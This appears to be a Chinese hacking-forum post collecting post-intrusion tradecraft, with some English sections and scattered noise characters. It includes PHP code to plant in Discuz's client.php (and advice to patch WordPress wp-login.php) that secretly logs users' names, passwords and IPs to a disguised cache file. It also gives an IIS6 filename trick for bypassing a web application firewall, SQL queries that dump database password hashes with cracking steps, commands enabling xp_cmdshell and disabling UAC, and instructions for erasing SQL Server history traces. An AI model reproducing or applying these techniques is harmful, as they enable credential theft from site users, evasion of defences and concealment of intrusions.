当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。6 V2 Z) {2 V }. k5 i e
就是搜索case ‘login’
& Q. ^0 Y, J7 {% J: i在它下面直接插入即可,记录的密码生成在pwd.txt中,
8 r* F, i |! Y7 _8 k/ ^7 M其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录% Z* S3 n4 Z" G
利用II6文件解析漏洞绕过安全狗代码:% v0 ^) M6 r. }
;antian365.asp;antian365.jpg
2 j/ {, l5 z1 n0 `0 `$ B! o* L/ |( }, ]! r6 L
各种类型数据库抓HASH破解最高权限密码!
' p1 |8 |6 g) T8 j9 {- P1.sql server2000- J* R' [5 f* X- y
SELECT password from master.dbo.sysxlogins where name='sa'
$ Q I( j! r5 d" K3 @ r7 B0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503417 A, G1 z4 J) I# q7 f) ?
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A; K- Z: p; _1 V% s( a. h, |
7 o2 ]0 m3 ^* m5 F0×0100- constant header
& Q) |6 ~ B: q2 E$ U5 K4 o34767D5C- salt
% u8 _# {& ^0 @) }0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
8 |1 M# p1 G4 {: l0 z4 C; u+ S4 ?2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash8 [$ d ^) ]! w, u0 Y4 k8 `) O
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash6 g5 C# z8 \7 S8 R/ B5 m# a' s5 z
SQL server 2005:-
/ f" M |$ p) t9 [$ M! l7 a1 vSELECT password_hash FROM sys.sql_logins where name='sa'
7 o+ A+ H6 q5 T& y1 R( z: G. I0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F. V$ x) Z b8 ?8 ~# {
0×0100- constant header0 _8 d4 }: I: w* M r% {
993BF231-salt
* Z# U' Z1 B1 M" E5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
* f' I" L \6 T: D4 L) H6 ~* _crack case sensitive hash in cain, try brute force and dictionary based attacks.
. H; N/ L. I9 } h4 q! v4 r
V8 O% Y( w1 o$ \update:- following bernardo’s comments:-+ E- W) [, e R8 A$ V0 y2 e8 D
use function fn_varbintohexstr() to cast password in a hex string.
' @) @$ l2 D( | Y' k! x* ~+ Ie.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
% N$ v% o' d+ g$ G2 _6 Y1 p! f+ E: i5 b: n% h* L
MYSQL:-
; D6 X- i, m" x) Y4 Q- \: X7 G# M3 Y1 P" A0 i$ H8 G1 x! C
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
) A; @2 t& j% T
* S' a4 ?) D+ y3 c6 G*mysql < 4.1$ v+ l4 S3 w/ Z0 x q( t
6 q+ V% w7 C, f$ C( E; w# d
mysql> SELECT PASSWORD(‘mypass’);
4 I/ j3 w& W( r+——————–+4 H+ r2 M" { h* |
| PASSWORD(‘mypass’) |
3 {/ ?- i* N3 b: h' c* l1 Z1 l+——————–+
, x3 E0 ?9 ~" t6 R6 U2 \| 6f8c114b58f2ce9e |: c: E# Z) u( }! D/ ~
+——————–+9 P' I9 S5 I9 G1 f: E: V
, x' J( h: N. B*mysql >=4.13 j, w- N- s! H
# r6 L d* o! c' A, j+ Nmysql> SELECT PASSWORD(‘mypass’);
3 Y- O7 ]* |# a2 \+——————————————-+
' ]. K% V8 v2 F' X$ K| PASSWORD(‘mypass’) |2 K2 X6 i! K$ {# n {1 @- B
+——————————————-+' G1 @9 G1 p1 Z: h" `8 J2 Y
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
! O" I1 o5 q$ m8 m' k+ X+——————————————-+3 n( G4 K9 O3 t8 |4 q
. ^3 e* l4 A& T) T& q
Select user, password from mysql.user
1 ^% B4 H5 d6 i. C$ _The hashes can be cracked in ‘cain and abel’
- J0 L8 Q0 _1 u8 R! Q7 S! u. H2 @; O1 T3 _/ ~; B+ Q
Postgres:-- {0 m3 e' b* W8 S% u* B* w0 I3 @8 E
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”). Q3 m/ w' E+ c) z4 y( u: e
select usename, passwd from pg_shadow;7 u# P% L. q% W7 k7 ?
usename | passwd
# T ^4 C% {' N- t! Z' g6 {' q——————+————————————-) Q) V1 N: Q$ _& \+ S
testuser | md5fabb6d7172aadfda4753bf0507ed4396
+ U6 \" w0 ^# B' buse mdcrack to crack these hashes:-
! H5 n" H3 m% T5 j$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
4 m# ^4 i$ T; Q
/ t5 ]& ]7 ~1 C" ~) h# COracle:-. e0 p ^0 L0 s8 q
select name, password, spare4 from sys.user$1 T$ ~3 Q) K, A0 Y3 A# \
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
" p O& A' w$ KMore on Oracle later, i am a bit bored….& l* K$ M, {1 R- |" A8 J8 L
6 H: k0 D$ P* A4 H" ?3 f; c. V
+ Z9 Z3 C! c5 ~* P! h在sql server2005/2008中开启xp_cmdshell
7 C2 b6 ?, s- |, ~. N- d4 \-- To allow advanced options to be changed.
' i, J, |9 P5 |3 GEXEC sp_configure 'show advanced options', 1
9 f9 V- n0 X$ g# O! [# CGO
. w( b/ l5 Y; o-- To update the currently configured value for advanced options.
9 w6 P3 ^. z" e2 Z' MRECONFIGURE
$ e+ c2 _" F8 U* d( ZGO6 B. c0 g7 t5 o" Z
-- To enable the feature.
" _. O k8 C1 w9 V) jEXEC sp_configure 'xp_cmdshell', 18 b$ T. U; o# z1 L, s/ d' Q
GO4 m) q2 q( ]1 a% W
-- To update the currently configured value for this feature.
8 M Y+ H( w" b# B3 MRECONFIGURE
$ F5 J9 _2 q+ a7 L0 [- g+ u4 GGO
: y0 T0 f$ Y0 v, e1 ~/ L1 JSQL 2008 server日志清除,在清楚前一定要备份。
+ B: h# @3 C0 K T; ~0 `' f+ b如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:9 r& ~: \$ X. O9 T
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
' n8 h. d3 Q$ z4 A C1 Q: @# m
8 E X% O; L' Y. D" {0 y对于SQL Server 2008以前的版本:0 F) s, o% P- ?
SQL Server 2005:
2 ~- j, \6 \6 [8 ]9 Q6 ^, Y5 w删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
7 X) C' I- n2 vSQL Server 2000:
/ h \) v- S `$ c; Z0 b清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
8 q) b9 J7 \, W
+ ^7 v( ^' x5 y) u2 e* K! _本帖最后由 simeon 于 2013-1-3 09:51 编辑; S9 S. t5 M& I5 }, C& ^
, j' H' L, p$ a) s; C; s, ~
. C: R) v, J5 w* L- t; B2 Mwindows 2008 文件权限修改7 `# v" l- b7 n: {" \' m/ d
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx% T$ |8 w; y% I4 p6 J* E
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad989 H4 I! s1 _+ o, ?+ y9 r% ^
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
% B9 u* o1 t9 ~) U4 W
. [* j+ \6 t* \" K+ e: B5 {Windows Registry Editor Version 5.00" B% S% a5 A" _9 M1 @) n4 F( A
[HKEY_CLASSES_ROOT\*\shell\runas]
9 i) [1 ^. L) v, j1 f, y0 N@="管理员取得所有权"
. L+ \) J% ]. D0 f7 e" D U"NoWorkingDirectory"=""
+ m3 |( L3 E1 q& [[HKEY_CLASSES_ROOT\*\shell\runas\command]
) X3 W3 x, v6 j8 l! i' y$ Q@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
9 F7 ~6 K2 ]7 C; e2 f"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"1 I s8 i) z" O1 z; m+ Q% O
[HKEY_CLASSES_ROOT\exefile\shell\runas2]" @; O) |( c6 E+ \& I
@="管理员取得所有权"
2 d v0 U% T' q j& e"NoWorkingDirectory"=""
R$ A/ a$ { W- k' o' @7 N[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
+ A, o3 v3 ^) ]3 c, @! `0 W( [@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
6 e# X: o$ d b& c1 j"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F". p9 X" T0 U. u+ W
* N# U7 F. g' q. Y: O
[HKEY_CLASSES_ROOT\Directory\shell\runas]1 z1 p8 i3 D8 f. k7 G
@="管理员取得所有权"
0 W q5 K2 [* G V" e2 G% {"NoWorkingDirectory"=""' b8 L* A) U- z0 O" W. N
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]% u0 | q" c) r- ^' n
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
* P* z8 h0 Y5 O* ?"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
0 ?- H& i( \: Z4 ?# T+ X, d
3 J; K2 a. S# X( r k* P! o& h; P
/ T0 T( D l9 ~# E. cwin7右键“管理员取得所有权”.reg导入
* m6 P/ W1 M' c" D3 L& s6 m1 L二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”, }0 M& u- [3 B* Y" x- ?# w) b( q
1、C:\Windows这个路径的“notepad.exe”不需要替换
5 Y# O9 e% {7 N* x5 k- ^5 S- C2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
& o0 D9 [& S# \- ] H" @/ F0 C! S3、四个“notepad.exe.mui”不要管
0 j: @% n$ q! `* A9 w4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
: H6 e) d3 D X& LC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
! D/ t! B8 \* ]: `0 B+ w" p/ A替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
6 `0 P3 j- P0 t2 F# L替换完之后回到桌面,新建一个txt文档打开看看是不是变了。8 e1 V3 \/ D% `
windows 2008中关闭安全策略: ( q7 t$ x. [ y
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
# R5 z9 l# q( W% I& U4 @+ @7 m修改uc_client目录下的client.php 在( T" U% O2 g1 e
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {% V5 n4 L$ B& Q
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php: E; j, I6 H' G) [. F
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
) r: J" M4 N' C' Y5 nif(getenv('HTTP_CLIENT_IP')) {
7 K2 A) N- _0 P% D" ]( _& l$ q7 H; u$onlineip = getenv('HTTP_CLIENT_IP');
: v! x# p' p* s* J} elseif(getenv('HTTP_X_FORWARDED_FOR')) {$ e8 o& D3 g; f6 W% s8 _ h
$onlineip = getenv('HTTP_X_FORWARDED_FOR');; d8 A" V4 d- P& x. |: C6 c: m: ~+ R
} elseif(getenv('REMOTE_ADDR')) {
; U/ L* T! F7 s$onlineip = getenv('REMOTE_ADDR');
( I4 B5 V- t7 e. \( Q} else {
; N1 z/ _3 }- P$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
! i( F6 T; [& P6 q- W4 ~% P}
0 g/ [0 h% }1 y2 q1 h) C, e a $showtime=date("Y-m-d H:i:s");
7 G- C- \$ D# m4 A; T1 r $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";* V* I0 E% f S5 r
$handle=fopen('./data/cache/csslog.php','a+');- ]5 ~& A/ F5 m9 F
$write=fwrite($handle,$record); |